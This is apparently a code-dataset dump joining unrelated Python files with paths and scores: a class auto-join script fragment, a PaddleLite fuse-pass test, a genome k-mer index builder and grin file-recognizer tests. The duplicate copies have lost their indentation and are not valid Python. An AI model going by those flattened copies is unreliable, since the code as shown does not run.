    get_next_class; every full day of offset adds 86400 seconds.
    """
    whole_days = {0: 0, 1: 86400}.get(nxclass[1], 172800)
    fmt = '%H:%M:%S'
    class_start = datetime.datetime.strptime(twelve_to_24(nxclass[0][1]), fmt)
    now = datetime.datetime.strptime(twelve_to_24(cxtime), fmt)
    # The clock delta may be negative when the class is on a later day;
    # the day offset added above compensates.
    return whole_days + int((class_start - now).total_seconds())
def mainrunner():
    """Main loop: wait for the next scheduled class and open its meet link.

    Runs forever; each iteration reloads the pickled timetables for
    today, tomorrow and the day after, sleeps until shortly before the
    next class, resolves the meeting link and opens it in the browser.
    """
    awesome_disp = pyfiglet.figlet_format('AUTOMEET')
    while(1):
        os.system('cls' if os.name == 'nt' else 'clear')
        print(awesome_disp)
        creds = tt_runner()
        today = days[datetime.date.today().weekday()] #days gets the value(string) of the current day
        tom = datetime.date.today() + datetime.timedelta(days=1)
        datom = datetime.date.today() + datetime.timedelta(days=2)
        tomorrow = days[tom.weekday()]
        dayaftertom = days[datom.weekday()]
        # Timetables are pickled per-day under ./timetables/<day>.pkl.
        # NOTE(review): Windows-style '\\' separators — confirm this only
        # runs on Windows, or switch to os.path.join.
        file_handler = open(os.getcwd()+'\\timetables\\'+today+'.pkl',"rb")
        today_classes_list = pickle.load(file_handler)
        file_handler.close()
        file_handler = open(os.getcwd()+'\\timetables\\'+tomorrow+'.pkl',"rb")
        tomorrow_classes_list = pickle.load(file_handler)
        file_handler.close()
        file_handler = open(os.getcwd()+'\\timetables\\'+dayaftertom+'.pkl',"rb")
        dayafter_classes_list = pickle.load(file_handler)
        file_handler.close()
        current_time = datetime.datetime.now().time().strftime("%I:%M %p")
        next_class = get_next_class(current_time,today_classes_list,today,tomorrow_classes_list,tomorrow,dayafter_classes_list,dayaftertom)
        remaining_time = calculate_seconds(current_time,next_class)
        print('Next Class',next_class[0][0], 'is at', next_class[0][1], 'and starts in', int(remaining_time)//60,'minutes')
        # Count down until 5 minutes (300 s) before the class starts.
        for i in range(remaining_time-300,0,-1):
            sys.stdout.write(' '+str(i)+' seconds remaining' + '\r')
            sys.stdout.flush()
            time.sleep(1) #sleeps the program until 5 min before the upcoming class
        class_link = cac.getthelink(next_class,creds) #calendaraccess returns the google meet link, or None
        if class_link == None:
            # No calendar entry yet: wait another 8 minutes, then fall
            # back to fetching the link from Google Classroom.
            for i in range(480,0,-1):
                sys.stdout.write(' '+str(i)+' seconds remaining' + '\r')
                sys.stdout.flush()
                time.sleep(1)
            class_link = ma.get_the_link(next_class,creds)
        print('\n\n','Class Link is ',class_link)
        wph.web_page_opener(class_link) #webPageHandler opens the link in the current browser profile and closes it once the class is over
import sys
sys.path.append('..')
from auto_scan_test import FusePassAutoScanTest
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume, reproduce_failure
import hypothesis.strategies as st
class TestSqueeze2MatmulFusePass(FusePassAutoScanTest):
    def __init__(self, *args, **kwargs):
        # Register the (target, precision, layout) combinations this fuse
        # pass is exercised on.
        FusePassAutoScanTest.__init__(self, *args, **kwargs)
        self.enable_testing_on_place(
            TargetType.ARM,
            PrecisionType.FP32,
            DataLayoutType.NCHW,
            thread=[1, 4])
        # x86
        self.enable_testing_on_place(
            TargetType.X86,
            PrecisionType.FP32,
            DataLayoutType.NCHW,
            thread=[1, 4])
        # Metal (GPU) places in FP32/FP16 texture layout, plus ARM/Host
        # places used alongside them.
        metal_places = [
            Place(TargetType.Metal, PrecisionType.FP32,
                  DataLayoutType.MetalTexture2DArray),
            Place(TargetType.Metal, PrecisionType.FP16,
                  DataLayoutType.MetalTexture2DArray),
            Place(TargetType.ARM, PrecisionType.FP32),
            Place(TargetType.Host, PrecisionType.FP32)
        ]
        self.enable_testing_on_place(places=metal_places)
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
target_type = predictor_config.target()
in_shape = list(program_config.inputs["squeeze2_input_x"].shape)
if target_type in [TargetType.Metal]:
if in_shape[1] != 1:
return False
return True
def sample_program_configs(self, draw):
alpha = draw(st.floats(min_value=1, max_value=1)) #required in pass
x_num_col_dims = draw(st.floats(min_value=0, max_value=1))
y_num_col_dims = draw(st.floats(min_value=0, max_value=1))
int32_values_1 = draw(st.integers(min_value=1, max_value=40))
int32_values_2 = draw(st.integers(min_value=1, max_value=40))
int32_values_3 = draw(st.integers(min_value=1, max_value=40))
squeeze2_input_shape = [int32_values_1, int32_values_2, 1, 1]
matmul_input_shape = [squeeze2_input_shape[1], int32_values_3]
scale_x = draw(st.sampled_from([0.1, 1.1]))
scale_y = draw(st.sampled_from([0.1, 1.1]))
scale_out = draw(st.sampled_from([0.1, 1.1]))
force_fp32_output = draw(st.booleans())
squeeze2_op = OpConfig(
type="squeeze2",
inputs={"X": ["squeeze2_input_x"]},
outputs={
"Out": ["squeeze2_output"],
"XShape": ["squeeze2_output_XShape"]
},
attrs={
"axes": [2, 3] #required in pass
})
matmul_op = OpConfig(
type="matmul",
inputs={"X": ["squeeze2_output"],
"Y": ["matmul_input"]},
outputs={"Out": ["output_data"]},
attrs={
"transpose_X": False, #required in pass
"transpose_Y": False, #required in pass
"x_num_col_dims": x_num_col_dims,
"y_num_col_dims": y_num_col_dims,
"Scale_x": scale_x,
"Scale_y": scale_y,
"Scale_out": scale_out,
"force_fp32_output": force_fp32_output,
"alpha": alpha,
"fused_reshape_X": [],
"fused_transpose_X": [],
"fused_reshape_Y": [],
"fused_transpose_Y": [],
"fused_reshape_Out": [],
"fused_transpose_Out": [],
"head_number": int(1)
})
ops = [squeeze2_op, matmul_op]
program_config = ProgramConfig(
ops=ops,
weights={},
inputs={
"squeeze2_input_x": TensorConfig(shape=squeeze2_input_shape),
"matmul_input": TensorConfig(shape=matmul_input_shape)
},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
atol, rtol = 1e-5, 1e-5
config_lists = self.get_predictor_configs()
for config in config_lists:
if config.target() in [TargetType.Metal]:
atol, rtol = 1e-2, 1e-2
return self.get_predictor_configs(), ["mul"], (atol, rtol)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
target_str = self.get_target()
max_examples = 25
if target_str in ["Metal"]:
# Make sure to generate enough valid cases for specific targets
max_examples = 500
self.run_and_statis(
quant=False,
max_examples=max_examples,
passes=["lite_squeeze2_matmul_fuse_pass"])
if __name__ == "__main__":
unittest.main(argv=['']) | lite/tests/unittest_py/pass/test_squeeze2_matmul_fuse_pass.py |
import sys
sys.path.append('..')
from auto_scan_test import FusePassAutoScanTest
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume, reproduce_failure
import hypothesis.strategies as st
class TestSqueeze2MatmulFusePass(FusePassAutoScanTest):
def __init__(self, *args, **kwargs):
FusePassAutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(
TargetType.ARM,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 4])
#x86
self.enable_testing_on_place(
TargetType.X86,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 4])
#Metal
metal_places = [
Place(TargetType.Metal, PrecisionType.FP32,
DataLayoutType.MetalTexture2DArray),
Place(TargetType.Metal, PrecisionType.FP16,
DataLayoutType.MetalTexture2DArray),
Place(TargetType.ARM, PrecisionType.FP32),
Place(TargetType.Host, PrecisionType.FP32)
]
self.enable_testing_on_place(places=metal_places)
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
target_type = predictor_config.target()
in_shape = list(program_config.inputs["squeeze2_input_x"].shape)
if target_type in [TargetType.Metal]:
if in_shape[1] != 1:
return False
return True
def sample_program_configs(self, draw):
alpha = draw(st.floats(min_value=1, max_value=1)) #required in pass
x_num_col_dims = draw(st.floats(min_value=0, max_value=1))
y_num_col_dims = draw(st.floats(min_value=0, max_value=1))
int32_values_1 = draw(st.integers(min_value=1, max_value=40))
int32_values_2 = draw(st.integers(min_value=1, max_value=40))
int32_values_3 = draw(st.integers(min_value=1, max_value=40))
squeeze2_input_shape = [int32_values_1, int32_values_2, 1, 1]
matmul_input_shape = [squeeze2_input_shape[1], int32_values_3]
scale_x = draw(st.sampled_from([0.1, 1.1]))
scale_y = draw(st.sampled_from([0.1, 1.1]))
scale_out = draw(st.sampled_from([0.1, 1.1]))
force_fp32_output = draw(st.booleans())
squeeze2_op = OpConfig(
type="squeeze2",
inputs={"X": ["squeeze2_input_x"]},
outputs={
"Out": ["squeeze2_output"],
"XShape": ["squeeze2_output_XShape"]
},
attrs={
"axes": [2, 3] #required in pass
})
matmul_op = OpConfig(
type="matmul",
inputs={"X": ["squeeze2_output"],
"Y": ["matmul_input"]},
outputs={"Out": ["output_data"]},
attrs={
"transpose_X": False, #required in pass
"transpose_Y": False, #required in pass
"x_num_col_dims": x_num_col_dims,
"y_num_col_dims": y_num_col_dims,
"Scale_x": scale_x,
"Scale_y": scale_y,
"Scale_out": scale_out,
"force_fp32_output": force_fp32_output,
"alpha": alpha,
"fused_reshape_X": [],
"fused_transpose_X": [],
"fused_reshape_Y": [],
"fused_transpose_Y": [],
"fused_reshape_Out": [],
"fused_transpose_Out": [],
"head_number": int(1)
})
ops = [squeeze2_op, matmul_op]
program_config = ProgramConfig(
ops=ops,
weights={},
inputs={
"squeeze2_input_x": TensorConfig(shape=squeeze2_input_shape),
"matmul_input": TensorConfig(shape=matmul_input_shape)
},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
atol, rtol = 1e-5, 1e-5
config_lists = self.get_predictor_configs()
for config in config_lists:
if config.target() in [TargetType.Metal]:
atol, rtol = 1e-2, 1e-2
return self.get_predictor_configs(), ["mul"], (atol, rtol)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
target_str = self.get_target()
max_examples = 25
if target_str in ["Metal"]:
# Make sure to generate enough valid cases for specific targets
max_examples = 500
self.run_and_statis(
quant=False,
max_examples=max_examples,
passes=["lite_squeeze2_matmul_fuse_pass"])
if __name__ == "__main__":
unittest.main(argv=['']) | 0.599368 | 0.350171 |
from numba import jit
import numpy as np
import re
from multiprocessing import Pool
from math import ceil
@jit
def BaseToNum(chr_seq):
chr_seq = re.sub(r'A', '1', chr_seq)
chr_seq = re.sub(r'C', '2', chr_seq)
chr_seq = re.sub(r'G', '3', chr_seq)
chr_seq = re.sub(r'T', '4', chr_seq)
return chr_seq
@jit
def BaseToIndex(word,word_len):
tmp = 0
for i,v in enumerate(word):
tmp += (int(v)-1)*4**(word_len-i)
return tmp
@jit
def GenSeek(library,word_len):
seeks = np.zeros((4**word_len,2),dtype=int)
tmp = 0
for i,l in enumerate(library):
seeks[i,0] = tmp
seeks[i,1] = len(l)
tmp += len(l)
return seeks
def BuildLibrary(chr_name):
word_len = 11
chr_seq = chrom_dict[chr_name]
chr_seq = BaseToNum(chr_seq)
chr_len = len(chr_seq)
library = np.zeros(4**word_len,dtype=str).tolist()
ii = 0
while ii<chr_len-word_len:
w = chr_seq[ii:ii+word_len]
ii += 1
if 'N' in w:
continue
try:
library[BaseToIndex(w,word_len-1)] += str(ii)+","
except:
pass
seeks = GenSeek(library,word_len)
lib_seq = ''.join(library)
with open('/home/jxiaoae/class/blast/chromosome_{}_library.txt'.format(chr_name), 'w') as f:
f.write(lib_seq)
f.close()
np.save('/home/jxiaoae/class/blast/chromosome_{}_library_seeks.npy'.format(chr_name),seeks)
if __name__ == '__main__':
hg19 = open("/home/share/GRCh37/human_g1k_v37.fasta")
head = True
chrom_dict = {}
head_line = []
chr_names = []
for line in hg19:
if re.match(r">[1-9X-Y]|[12][0-9]",line):
head_line.append(line)
if head:
head = False
else:
chr_seq = re.sub(r'\n', '', chr_seq)
chr_seq = chr_seq.upper()
chrom_dict[chr_name] = chr_seq
chr_name = line.split()[0][1:]
chr_names.append(chr_name)
chr_seq = ''
print(chr_name,end=",")
else:
chr_seq += line
chr_seq = re.sub(r'\n', '', chr_seq)
chr_seq = chr_seq.upper()
chrom_dict[chr_name] = chr_seq
chrom_seek_index = np.array([[int(line.split(":")[-2]),len(line)] for line in head_line])
for i in range(1,24):
chrom_seek_index[i,1]=chrom_seek_index[i,1]+chrom_seek_index[i-1,1]+chrom_seek_index[i-1,0]+ceil(chrom_seek_index[i-1,0]/60)
np.save('/home/jxiaoae/class/blast/GRCh37_chrom_seek_index.npy',chrom_seek_index)
np.save('/home/jxiaoae/class/blast/GRCh37_chr_names.npy',np.array(chr_names))
print(chr_names)
# reset multiprocessing num according to your server
with Pool(10) as p:
p.map(BuildLibrary, chr_names) | build_library.py | from numba import jit
import numpy as np
import re
from multiprocessing import Pool
from math import ceil
@jit
def BaseToNum(chr_seq):
chr_seq = re.sub(r'A', '1', chr_seq)
chr_seq = re.sub(r'C', '2', chr_seq)
chr_seq = re.sub(r'G', '3', chr_seq)
chr_seq = re.sub(r'T', '4', chr_seq)
return chr_seq
@jit
def BaseToIndex(word,word_len):
tmp = 0
for i,v in enumerate(word):
tmp += (int(v)-1)*4**(word_len-i)
return tmp
@jit
def GenSeek(library,word_len):
seeks = np.zeros((4**word_len,2),dtype=int)
tmp = 0
for i,l in enumerate(library):
seeks[i,0] = tmp
seeks[i,1] = len(l)
tmp += len(l)
return seeks
def BuildLibrary(chr_name):
word_len = 11
chr_seq = chrom_dict[chr_name]
chr_seq = BaseToNum(chr_seq)
chr_len = len(chr_seq)
library = np.zeros(4**word_len,dtype=str).tolist()
ii = 0
while ii<chr_len-word_len:
w = chr_seq[ii:ii+word_len]
ii += 1
if 'N' in w:
continue
try:
library[BaseToIndex(w,word_len-1)] += str(ii)+","
except:
pass
seeks = GenSeek(library,word_len)
lib_seq = ''.join(library)
with open('/home/jxiaoae/class/blast/chromosome_{}_library.txt'.format(chr_name), 'w') as f:
f.write(lib_seq)
f.close()
np.save('/home/jxiaoae/class/blast/chromosome_{}_library_seeks.npy'.format(chr_name),seeks)
if __name__ == '__main__':
hg19 = open("/home/share/GRCh37/human_g1k_v37.fasta")
head = True
chrom_dict = {}
head_line = []
chr_names = []
for line in hg19:
if re.match(r">[1-9X-Y]|[12][0-9]",line):
head_line.append(line)
if head:
head = False
else:
chr_seq = re.sub(r'\n', '', chr_seq)
chr_seq = chr_seq.upper()
chrom_dict[chr_name] = chr_seq
chr_name = line.split()[0][1:]
chr_names.append(chr_name)
chr_seq = ''
print(chr_name,end=",")
else:
chr_seq += line
chr_seq = re.sub(r'\n', '', chr_seq)
chr_seq = chr_seq.upper()
chrom_dict[chr_name] = chr_seq
chrom_seek_index = np.array([[int(line.split(":")[-2]),len(line)] for line in head_line])
for i in range(1,24):
chrom_seek_index[i,1]=chrom_seek_index[i,1]+chrom_seek_index[i-1,1]+chrom_seek_index[i-1,0]+ceil(chrom_seek_index[i-1,0]/60)
np.save('/home/jxiaoae/class/blast/GRCh37_chrom_seek_index.npy',chrom_seek_index)
np.save('/home/jxiaoae/class/blast/GRCh37_chr_names.npy',np.array(chr_names))
print(chr_names)
# reset multiprocessing num according to your server
with Pool(10) as p:
p.map(BuildLibrary, chr_names) | 0.180504 | 0.178848 |
from __future__ import print_function, unicode_literals
import contextlib
import gzip
import os
import shutil
import socket
import sys
from io import open
from functools import partial
import nose
from grin import FileRecognizer, GZIP_MAGIC
printerr = partial(print, file=sys.stderr)
ALL_BYTES = bytes(bytearray(range(256)))
def empty_file(filename, open=open):
open(filename, "a").close()
def binary_file(filename, open=open):
with open(filename, "wb") as f:
f.write(ALL_BYTES)
def text_file(filename, open=open):
lines = [b"foo\n", b"bar\n"] * 100
lines.append(b"baz\n")
lines.extend([b"foo\n", b"bar\n"] * 100)
with open(filename, "wb") as f:
f.writelines(lines)
def fake_gzip_file(filename, open=open):
""" Write out a binary file that has the gzip magic header bytes, but is not
a gzip file.
"""
with open(filename, "wb") as f:
f.write(GZIP_MAGIC)
f.write(ALL_BYTES)
def binary_middle(filename, open=open):
""" Write out a file that is text for the first 100 bytes, then 100 binary
bytes, then 100 text bytes to test that the recognizer only reads some of
the file.
"""
text = b"a" * 100 + b"\0" * 100 + b"b" * 100
f = open(filename, "wb")
f.write(text)
f.close()
def socket_file(filename):
s = socket.socket(socket.AF_UNIX)
s.bind(filename)
def unreadable_file(filename):
""" Write a file that does not have read permissions.
"""
text_file(filename)
os.chmod(filename, 0o200)
try:
with open(filename) as f:
pass
except IOError as e:
if "Permission denied" not in str(e):
raise
else:
raise RuntimeError(
"grin tests cannot run on a filesystem that doesn't support chmod(). "
"You will encounter false negative"
)
def unreadable_dir(filename):
""" Make a directory that does not have read permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o300)
def unexecutable_dir(filename):
""" Make a directory that does not have execute permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o600)
def totally_unusable_dir(filename):
""" Make a directory that has neither read nor execute permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o100)
def setup():
# Make sure we don't have files remaining from previous tests
teardown()
# Make files to test individual recognizers.
empty_file(b"empty")
binary_file(b"binary")
binary_middle(b"binary_middle")
text_file(b"text")
text_file(b"text~")
text_file(b"text#")
text_file(b"foo.bar.baz")
os.mkdir(b"dir")
binary_file(b".binary")
text_file(b".text")
empty_file(b"empty.gz", open=gzip.open)
binary_file(b"binary.gz", open=gzip.open)
text_file(b"text.gz", open=gzip.open)
binary_file(b".binary.gz", open=gzip.open)
text_file(b".text.gz", open=gzip.open)
fake_gzip_file("fake.gz")
os.mkdir(b".dir")
os.symlink(b"binary", b"binary_link")
os.symlink(b"text", b"text_link")
os.symlink(b"dir", b"dir_link")
os.symlink(b".binary", b".binary_link")
os.symlink(b".text", b".text_link")
os.symlink(b".dir", b".dir_link")
unreadable_file(b"unreadable_file")
unreadable_dir(b"unreadable_dir")
unexecutable_dir(b"unexecutable_dir")
totally_unusable_dir(b"totally_unusable_dir")
os.symlink(b"unreadable_file", b"unreadable_file_link")
os.symlink(b"unreadable_dir", b"unreadable_dir_link")
os.symlink(b"unexecutable_dir", b"unexecutable_dir_link")
os.symlink(b"totally_unusable_dir", b"totally_unusable_dir_link")
text_file(b"text.skip_ext")
os.mkdir(b"dir.skip_ext")
text_file(b"text.dont_skip_ext")
os.mkdir(b"skip_dir")
text_file(b"fake_skip_dir")
socket_file("socket_test")
# Make a directory tree to test tree-walking.
os.mkdir(b"tree")
os.mkdir(b"tree/.hidden_dir")
os.mkdir(b"tree/dir")
os.mkdir(b"tree/dir/subdir")
text_file(b"tree/dir/text")
text_file(b"tree/dir/subdir/text")
text_file(b"tree/text")
text_file(b"tree/text.skip_ext")
os.mkdir(b"tree/dir.skip_ext")
text_file(b"tree/dir.skip_ext/text")
text_file(b"tree/text.dont_skip_ext")
binary_file(b"tree/binary")
os.mkdir(b"tree/skip_dir")
text_file(b"tree/skip_dir/text")
os.mkdir(b"tree/.skip_hidden_dir")
text_file(b"tree/.skip_hidden_file")
os.mkdir(b"tree/unreadable_dir")
text_file(b"tree/unreadable_dir/text")
os.chmod("tree/unreadable_dir", 0o300)
os.mkdir(b"tree/unexecutable_dir")
text_file(b"tree/unexecutable_dir/text")
os.chmod(b"tree/unexecutable_dir", 0o600)
os.mkdir(b"tree/totally_unusable_dir")
text_file(b"tree/totally_unusable_dir/text")
os.chmod(b"tree/totally_unusable_dir", 0o100)
@contextlib.contextmanager
def catch_and_log_env_error(message=None, ignore="No such file or directory", args=()):
""" Catch IOError, print a message, optionnaly reraise. Ignore some types """
try:
yield
except EnvironmentError as e:
if ignore not in str(e):
if message is None:
raise e
printerr(message % (tuple(args) + (e,)))
def teardown():
files_to_delete = [
b"empty",
b"binary",
b"binary_middle",
b"text",
b"text~",
b"empty.gz",
b"binary.gz",
b"text.gz",
b"dir",
b"binary_link",
b"text_link",
b"dir_link",
b".binary",
b".text",
b".binary.gz",
b".text.gz",
b"fake.gz",
b".dir",
b".binary_link",
b".text_link",
b".dir_link",
b"unreadable_file",
b"unreadable_dir",
b"unexecutable_dir",
b"totally_unusable_dir",
b"unreadable_file_link",
b"unreadable_dir_link",
b"unexecutable_dir_link",
b"totally_unusable_dir_link",
b"text.skip_ext",
b"text.dont_skip_ext",
b"dir.skip_ext",
b"skip_dir",
b"fake_skip_dir",
b"text#",
b"foo.bar.baz",
b"tree",
b"socket_test"
]
for filename in files_to_delete:
with catch_and_log_env_error():
os.chmod(filename, 0o777)
if os.path.isdir(filename):
if not filename.startswith(b'/'):
# Make sure we have permission to delete everything
for dirname, dirs, files in os.walk(filename, followlinks=True):
paths = [os.path.join(dirname, p) for p in (dirs + files)]
os.chmod(dirname, 0o777)
for path in paths:
os.chmod(path, 0o777)
with catch_and_log_env_error("Could not delete %r: %r", args=(filename,)):
shutil.rmtree(filename)
else:
with catch_and_log_env_error("Could not delete %r: %r", args=(filename,)):
os.unlink(filename)
def test_binary():
fr = FileRecognizer()
assert fr.is_binary(b"binary")
assert fr.recognize_file(b"binary") == "binary"
assert fr.recognize(b"binary") == "binary"
def test_text():
fr = FileRecognizer()
assert not fr.is_binary(b"text")
assert fr.recognize_file(b"text") == "text"
assert fr.recognize(b"text") == "text"
def test_gzipped():
fr = FileRecognizer()
assert fr.is_binary(b"text.gz")
assert fr.recognize_file(b"text.gz") == "gzip"
assert fr.recognize(b"text.gz") == "gzip"
assert fr.is_binary(b"binary.gz")
assert fr.recognize_file(b"binary.gz") == "binary"
assert fr.recognize(b"binary.gz") == "binary"
assert fr.is_binary(b"fake.gz")
assert fr.recognize_file(b"fake.gz") == "binary"
assert fr.recognize(b"fake.gz") == "binary"
def test_binary_middle():
fr = FileRecognizer(binary_bytes=100)
assert not fr.is_binary(b"binary_middle")
assert fr.recognize_file(b"binary_middle") == "text"
assert fr.recognize(b"binary_middle") == "text"
fr = FileRecognizer(binary_bytes=101)
assert fr.is_binary(b"binary_middle")
assert fr.recognize_file(b"binary_middle") == "binary"
assert fr.recognize(b"binary_middle") == "binary"
def test_socket():
fr = FileRecognizer()
assert fr.recognize(b"socket_test") == "skip"
def test_dir():
fr = FileRecognizer()
assert fr.recognize_directory(b"dir") == "directory"
assert fr.recognize(b"dir") == "directory"
def test_skip_symlinks():
fr = FileRecognizer(skip_symlink_files=True, skip_symlink_dirs=True)
assert fr.recognize(b"binary_link") == "link"
assert fr.recognize_file(b"binary_link") == "link"
assert fr.recognize(b"text_link") == "link"
assert fr.recognize_file(b"text_link") == "link"
assert fr.recognize(b"dir_link") == "link"
assert fr.recognize_directory(b"dir_link") == "link"
def test_do_not_skip_symlinks():
fr = FileRecognizer(skip_symlink_files=False, skip_symlink_dirs=False)
assert fr.recognize(b"binary_link") == "binary"
assert fr.recognize_file(b"binary_link") == "binary"
assert fr.recognize(b"text_link") == "text"
assert fr.recognize_file(b"text_link") == "text"
assert fr.recognize(b"dir_link") == "directory"
assert fr.recognize_directory(b"dir_link") == "directory"
def test_skip_hidden():
fr = FileRecognizer(skip_hidden_files=True, skip_hidden_dirs=True)
assert fr.recognize(b".binary") == "skip"
assert fr.recognize_file(b".binary") == "skip"
assert fr.recognize(b".text") == "skip"
assert fr.recognize_file(b".text") == "skip"
assert fr.recognize(b".dir") == "skip"
assert fr.recognize_directory(b".dir") == "skip"
assert fr.recognize(b".binary_link") == "skip"
assert fr.recognize_file(b".binary_link") == "skip"
assert fr.recognize(b".text_link") == "skip"
assert fr.recognize_file(b".text_link") == "skip"
assert fr.recognize(b".dir_link") == "skip"
assert fr.recognize_directory(b".dir_link") == "skip"
assert fr.recognize(b".text.gz") == "skip"
assert fr.recognize_file(b".text.gz") == "skip"
assert fr.recognize(b".binary.gz") == "skip"
assert fr.recognize_file(b".binary.gz") == "skip"
def test_skip_backup():
fr = FileRecognizer(skip_backup_files=True)
assert fr.recognize_file(b"text~") == "skip"
def test_do_not_skip_backup():
fr = FileRecognizer(skip_backup_files=False)
assert fr.recognize_file(b"text~") == "text"
def test_skip_weird_exts():
fr = FileRecognizer(skip_exts=set())
assert fr.recognize_file(b"text#") == "text"
assert fr.recognize_file(b"foo.bar.baz") == "text"
fr = FileRecognizer(skip_exts=set([b"#", b".bar.baz"]))
assert fr.recognize_file(b"text#") == "skip"
assert fr.recognize_file(b"foo.bar.baz") == "skip"
def test_do_not_skip_hidden_or_symlinks():
fr = FileRecognizer(
skip_hidden_files=False,
skip_hidden_dirs=False,
skip_symlink_dirs=False,
skip_symlink_files=False,
)
assert fr.recognize(b".binary") == "binary"
assert fr.recognize_file(b".binary") == "binary"
assert fr.recognize(b".text") == "text"
assert fr.recognize_file(b".text") == "text"
assert fr.recognize(b".dir") == "directory"
assert fr.recognize_directory(b".dir") == "directory"
assert fr.recognize(b".binary_link") == "binary"
assert fr.recognize_file(b".binary_link") == "binary"
assert fr.recognize(b".text_link") == "text"
assert fr.recognize_file(b".text_link") == "text"
assert fr.recognize(b".dir_link") == "directory"
assert fr.recognize_directory(b".dir_link") == "directory"
assert fr.recognize(b".text.gz") == "gzip"
assert fr.recognize_file(b".text.gz") == "gzip"
assert fr.recognize(b".binary.gz") == "binary"
assert fr.recognize_file(b".binary.gz") == "binary"
def test_do_not_skip_hidden_but_skip_symlinks():
fr = FileRecognizer(
skip_hidden_files=False,
skip_hidden_dirs=False,
skip_symlink_dirs=True,
skip_symlink_files=True,
)
assert fr.recognize(b".binary") == "binary"
assert fr.recognize_file(b".binary") == "binary"
assert fr.recognize(b".text") == "text"
assert fr.recognize_file(b".text") == "text"
assert fr.recognize(b".dir") == "directory"
assert fr.recognize_directory(b".dir") == "directory"
assert fr.recognize(b".binary_link") == "link"
assert fr.recognize_file(b".binary_link") == "link"
assert fr.recognize(b".text_link") == "link"
assert fr.recognize_file(b".text_link") == "link"
assert fr.recognize(b".dir_link") == "link"
assert fr.recognize_directory(b".dir_link") == "link"
assert fr.recognize(b".text.gz") == "gzip"
assert fr.recognize_file(b".text.gz") == "gzip"
assert fr.recognize(b".binary.gz") == "binary"
assert fr.recognize_file(b".binary.gz") == "binary"
def test_lack_of_permissions():
fr = FileRecognizer()
assert fr.recognize(b"unreadable_file") == "unreadable"
assert fr.recognize_file(b"unreadable_file") == "unreadable"
assert fr.recognize(b"unreadable_dir") == "directory"
assert fr.recognize_directory(b"unreadable_dir") == "directory"
assert fr.recognize(b"unexecutable_dir") == "directory"
assert fr.recognize_directory(b"unexecutable_dir") == "directory"
assert fr.recognize(b"totally_unusable_dir") == "directory"
assert fr.recognize_directory(b"totally_unusable_dir") == "directory"
def test_symlink_src_unreadable():
fr = FileRecognizer(skip_symlink_files=False, skip_symlink_dirs=False)
assert fr.recognize(b"unreadable_file_link") == "unreadable"
assert fr.recognize_file(b"unreadable_file_link") == "unreadable"
assert fr.recognize(b"unreadable_dir_link") == "directory"
assert fr.recognize_directory(b"unreadable_dir_link") == "directory"
assert fr.recognize(b"unexecutable_dir_link") == "directory"
assert fr.recognize_directory(b"unexecutable_dir_link") == "directory"
assert fr.recognize(b"totally_unusable_dir_link") == "directory"
assert fr.recognize_directory(b"totally_unusable_dir_link") == "directory"
def test_skip_ext():
fr = FileRecognizer(skip_exts=set([b".skip_ext"]))
assert fr.recognize(b"text.skip_ext") == "skip"
assert fr.recognize_file(b"text.skip_ext") == "skip"
assert fr.recognize(b"text") == "text"
assert fr.recognize_file(b"text") == "text"
assert fr.recognize(b"text.dont_skip_ext") == "text"
assert fr.recognize_file(b"text.dont_skip_ext") == "text"
assert fr.recognize(b"dir.skip_ext") == "directory"
assert fr.recognize_directory(b"dir.skip_ext") == "directory"
def test_skip_dir():
fr = FileRecognizer(skip_dirs=set([b"skip_dir", b"fake_skip_dir"]))
assert fr.recognize(b"skip_dir") == "skip"
assert fr.recognize_directory(b"skip_dir") == "skip"
assert fr.recognize(b"fake_skip_dir") == "text"
assert fr.recognize_file(b"fake_skip_dir") == "text"
def test_walking():
fr = FileRecognizer(
skip_hidden_files=True,
skip_hidden_dirs=True,
skip_exts=set([b".skip_ext"]),
skip_dirs=set([b"skip_dir"]),
)
truth = [
(b"tree/binary", "binary"),
(b"tree/dir.skip_ext/text", "text"),
(b"tree/dir/subdir/text", "text"),
(b"tree/dir/text", "text"),
(b"tree/text", "text"),
(b"tree/text.dont_skip_ext", "text"),
]
result = sorted(fr.walk(b"tree"))
assert result == truth
def predot():
os.chdir(b"tree")
def postdot():
os.chdir(b"..")
@nose.with_setup(predot, postdot)
def test_dot():
fr = FileRecognizer(
skip_hidden_files=True,
skip_hidden_dirs=True,
skip_exts=set([b".skip_ext"]),
skip_dirs=set([b"skip_dir"]),
)
truth = [
(b"./binary", "binary"),
(b"./dir.skip_ext/text", "text"),
(b"./dir/subdir/text", "text"),
(b"./dir/text", "text"),
(b"./text", "text"),
(b"./text.dont_skip_ext", "text"),
]
result = sorted(fr.walk(b"."))
assert result == truth
def predotdot():
os.chdir(b"tree")
os.chdir(b"dir")
def postdotdot():
os.chdir(b"..")
os.chdir(b"..")
@nose.with_setup(predotdot, postdotdot)
def test_dot_dot():
fr = FileRecognizer(
skip_hidden_files=True,
skip_hidden_dirs=True,
skip_exts=set([b".skip_ext"]),
skip_dirs=set([b"skip_dir"]),
)
truth = [
(b"../binary", "binary"),
(b"../dir.skip_ext/text", "text"),
(b"../dir/subdir/text", "text"),
(b"../dir/text", "text"),
(b"../text", "text"),
(b"../text.dont_skip_ext", "text"),
]
result = sorted(fr.walk(b".."))
assert result == truth | tests/test_file_recognizer.py | from __future__ import print_function, unicode_literals
import contextlib
import gzip
import os
import shutil
import socket
import sys
from io import open
from functools import partial
import nose
